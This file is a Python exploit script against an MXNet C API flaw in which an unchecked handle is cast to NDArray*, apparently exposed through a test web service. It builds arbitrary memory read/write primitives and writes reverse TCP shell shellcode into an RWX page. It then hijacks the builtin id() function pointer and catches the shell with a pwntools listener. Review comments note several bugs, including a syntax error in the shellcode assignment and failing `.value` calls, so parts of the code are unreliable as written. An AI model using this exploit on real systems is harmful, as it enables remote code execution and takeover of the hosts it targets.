#!/usr/bin/env python3

'''

    MXNet Unsafe Pointer Usage Exploit




    Payload:

        Reverse TCP shell

'''

import ctypes

import mxnet as mx

import requests, json, base64

from pwn import *

from struct import pack, unpack

from time import sleep

from threading import Thread

from sys import argv




# Base URL of the target service; rebound from argv[1] in __main__.
URL = 'http://127.0.0.1:5000'

# Port for the local listener, also spliced into the shellcode; rebound from argv[3].
PORT = 1337

# Local listener bind address, also used as the reverse-shell IP; rebound from argv[2].
BIND_ADDRESS = '127.0.0.1'

# BIND_ADDRESS packed into a 32-bit integer; computed in __main__ before the
# shellcode is built.
REVERSE_SHELL_IP = 0




def MXNDArrayGetStorageType(handle, storage_type=-1):
    '''
        Ask the target service to exercise MXNDArrayGetStorageType.

        The vulnerable code path in src/c_api/c_api.cc is:

        int MXNDArrayGetStorageType(NDArrayHandle handle,
                                    int *out_storage_type) {
            API_BEGIN();
            NDArray *arr = static_cast<NDArray*>(handle);
            if (!arr->is_none()) {
                *out_storage_type = arr->storage_type();
            } else {
                *out_storage_type = kUndefinedStorage;
            }
            API_END();
        }

        `handle` is cast straight to NDArray* without any check. The value
        sent here is presumably forwarded to it by the service (TODO confirm
        against the service).

        Args:
            handle: integer sent as the `handle` query parameter.
            storage_type: when not -1, sent as the `storage_type` query
                parameter. w64 passes a destination address here, so it is
                presumably used server-side as `out_storage_type`.

        Returns:
            The `result` field of the JSON response, converted to int.
    '''
    query = {'handle': handle}
    if storage_type != -1:
        query['storage_type'] = storage_type
    reply = requests.get(URL + '/get_storage_type', params=query)
    return int(json.loads(reply.text)['result'])




def _id(id=0, objtype='int'):
    '''
        Plant a value in the target's memory and obtain its address.

        When objtype is 'int', `id` is sent unchanged. For any other objtype,
        `id` must be bytes and is base64-encoded before sending. This helper
        is not strictly required (r64 and w64 are the only required
        primitives), but it greatly simplifies exploitation for
        demonstration.

        The parameter keeps the name `id`, shadowing the builtin, so that
        existing keyword callers keep working.

        Returns:
            The `result` field of the JSON response, converted to int.
    '''
    payload = id if objtype == 'int' else base64.b64encode(id)
    reply = requests.get(URL + '/id', params={'id': payload, 'objtype': objtype})
    return int(json.loads(reply.text)['result'])




def rwx():
    '''
        Query the service for the location of its RWX page.

        This is an optional shortcut. Locating the page through reads alone
        would need per-version knowledge of Python and ctypes internals,
        which makes the demonstration less portable.

        Returns:
            The `result` field of the JSON response, converted to int.
    '''
    reply = requests.get(f'{URL}/rwx')
    body = json.loads(reply.text)
    return int(body['result'])




def get_id_reference():
    '''
        Find where the service's `id` lies in memory, for use as a trigger.

        Fetches the service root page and takes the first line containing
        the substring 'id'. The text after the first ': ' on that line is
        parsed as a decimal integer, which is printed in hex.

        NOTE(review): the substring test also matches lines where 'id' is
        part of another word. If no line matches, 0 is returned silently.
        Confirm the page format.

        Returns:
            The parsed integer, or 0 when no line contains 'id'.
    '''
    page = requests.get(URL + '/')
    found = next(
        (int(row.split(': ')[1]) for row in page.text.split('\n') if 'id' in row),
        0,
    )
    print('[i]\tgot id', hex(found))
    return found




def sizeof(obj):
    '''
        Return the size of `obj` as reported by its type's __sizeof__.

        The method is looked up on type(obj) and called directly. Unlike
        sys.getsizeof, this adds no garbage-collector overhead.

        Source: https://github.com/DavidBuchanan314/unsafe-python
    '''
    type_sizeof = type(obj).__sizeof__
    return type_sizeof(obj)




def r64(addr):
    '''
        Read a 64-bit value from `addr` as two 4-byte reads.

        Each read passes a handle 0x50 bytes below the target (and that
        address + 4), so the field returned as the storage type comes from
        `addr` (low dword) and `addr + 4` (high dword). Per the original
        notes, addr - 0x50 must be non-null. A half equal to 0xffffffff is
        treated as failure.

        Returns:
            The combined 64-bit integer, or False on failure.

        NOTE(review): MXNDArrayGetStorageType returns a plain int (it wraps
        the JSON result in int(...)), so the `.value` accesses below raise
        AttributeError as written. This helper is not called anywhere else
        in the visible script.

        NOTE(review): if the service reports failures as a signed value
        (e.g. -1) rather than 0xffffffff, the check and the shift/OR need
        masking with 0xffffffff. Confirm against the service.
    '''
    storage_type1 = MXNDArrayGetStorageType(addr-0x50)
    storage_type2 = MXNDArrayGetStorageType(addr-0x50+4)
    if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:
        return False
    # High dword in the upper 32 bits, low dword in the lower 32 bits.
    ret = (storage_type2.value << 32) | storage_type1.value
    return ret




def w64(addr, val):
    '''
        Write a 64-bit value (8 bytes, not 64 bytes) to `addr` in memory.

        The underlying primitive writes 4 bytes per call, so the QWORD is
        written in two halves: the low dword to `addr` and the high dword
        to `addr + 4`.

        Args:
            addr: destination address in the target process.
            val: 64-bit integer to write; packed little-endian.
    '''
    print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')
    # Plant a fake object: 0x10 bytes of 'A', 0x40 zero bytes, then `val`
    # packed twice, which puts `val` at offset 0x50. That is the same offset
    # r64 subtracts, presumably where storage_type() reads (TODO confirm
    # against the NDArray layout). The 'A' bytes are presumably there so the
    # fake object is not treated as is_none(); the reason `val` is
    # duplicated is not evident here.
    # Adding sizeof(b'') - 1 to the returned address presumably skips the
    # CPython bytes-object header to reach the raw payload (TODO confirm for
    # the target's Python build).
    fake_object_addr1 = _id(
        b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val)  + pack('<Q', val),
        objtype='base64') + sizeof(b'')-1
    # Low dword: the field at fake+0x50 is stored through `addr`, which is
    # passed as the storage_type (output) argument.
    MXNDArrayGetStorageType(
            fake_object_addr1,
            addr
            )
    # High dword: shifting the fake handle by 4 makes the same field read
    # from payload offset 0x54 (upper half of `val`), stored at addr + 4.
    MXNDArrayGetStorageType(
            fake_object_addr1 + 4,
            addr + 4
            )




def trigger(_):
    '''
        Fire the overwritten target after a short delay.

        Meant to run on a background Thread while the main thread blocks on
        the listener. It sleeps for 1 second, presumably so the main thread
        reaches wait_for_connection first, then issues an `_id(1)` request.

        Args:
            _: unused; accepted so the function can be passed to Thread with
               a single positional argument.

        Any exception raised by the request is deliberately ignored. The
        outcome is observed on the listener, not through this request's
        response.
    '''
    sleep(1)
    print('[+]\tTriggering the exploit!')
    try:
        _id(1)
    except Exception:
        # Best-effort: the request is expected to fail or never complete
        # normally. Catching Exception rather than using a bare `except:`
        # still lets SystemExit and KeyboardInterrupt propagate.
        pass




if __name__ == '__main__':
    # Expect exactly three arguments: target URL, reverse-shell IP, port.
    if len(argv) != 4:
        print('Usage:\n\tunsafe_pointer_exploit.py <target URL> <rev_shell_ip> <port>')
        exit(1)
    # These assignments run at module scope, so they rebind the globals the
    # helper functions read.
    URL = argv[1]
    # The same address is used as the local listener's bind address and as
    # the IP the shellcode connects back to.
    BIND_ADDRESS = argv[2]
    PORT = int(argv[3])
    # Pack the dotted-quad IPv4 address into a 32-bit integer, first octet
    # in the most significant byte.
    REVERSE_SHELL_IP = int(BIND_ADDRESS.split('.')[0]) << 24
    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[1]) << 16
    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[2]) << 8
    REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[3])
    print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')
    # Leak the address later used to locate the trigger, and the RWX page
    # that will hold the shellcode.
    id_ref = get_id_reference()
    RWX_ADDR = rwx()
    print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')
    # Write the shellcode halfway into the RWX page.
    RWX_ADDR += 0x800
    print(f'[+]\tset RWX_ADDR  += 0x800 (halfway through page): {hex(RWX_ADDR)}')

    # Reverse TCP shell shellcode, obtained from:
    #     https://shell-storm.org/shellcode/files/shellcode-857.html
    # PORT and REVERSE_SHELL_IP are spliced in big-endian (network byte
    # order) via pack('>H') and pack('>I').
    # NOTE(review): as this file stands, every trailing `\` below is followed
    # by a blank line. The blank line ends the logical line, so this
    # assignment is a SyntaxError. Remove the blank lines between the
    # continued lines.
    SHELLCODE = b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a' +\

                b'\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0' +\

                b'\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24' +\

                b'\x02'+ pack('>H', PORT) +b'\xc7\x44\x24\x04' +\

                pack('>I', REVERSE_SHELL_IP)+ b'\x48\x89\xe6\x6a\x10' +\

                b'\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48' +\

                b'\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a' +\

                b'\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54' +\

                b'\x5f\x6a\x3b\x58\x0f\x05'
    # Pad to a multiple of 8 so the shellcode can be written one QWORD at a
    # time with w64.
    # NOTE(review): when len(SHELLCODE) is already a multiple of 8 this
    # appends 8 extra zero bytes; (-len(SHELLCODE)) % 8 would append none.
    SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes
    print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')
    # Write the padded shellcode into the RWX page as little-endian QWORDs.
    for i in range(0, len(SHELLCODE), 8):
        v = unpack('<Q', SHELLCODE[i:i+8])[0]
        sc_addr = RWX_ADDR+i
        w64(sc_addr, v)
    print('[+]\tShellcode written!')

    # NOTE(review): 'builting' in the message below is a typo for 'builtin'.
    print('[+]\tDeriving address of Python3 builting function id...')
    # Presumably the offset of a function-pointer slot inside the target's
    # builtin `id` object. This is CPython-version-specific; confirm for
    # the target build.
    id_addr = id_ref+0x30

    print('[+]\tOverwriting id() function pointer with address to shellcode...')
    w64(id_addr, RWX_ADDR)

    print('[^]\tSetting up listening shell...')
    # pwntools listener (from `from pwn import *`) for the shell connection.
    l = listen(port=PORT, bindaddr=BIND_ADDRESS) # pwntools listen

    # trigger() waits 1 second and then issues an /id request on a
    # background thread; the main thread blocks below until a connection
    # arrives.
    t = Thread(target=trigger, args=(0,))
    t.start()

    c = l.wait_for_connection()
    print('['+'-'*60+']')
    print('[+]\tReceived a shell!!!')
    print('['+'-'*60+']')
    # Run a few identifying commands, then hand the connection to the user.
    c.send(b'id;whoami;pwd;\n\n\n\n')
    c.interactive()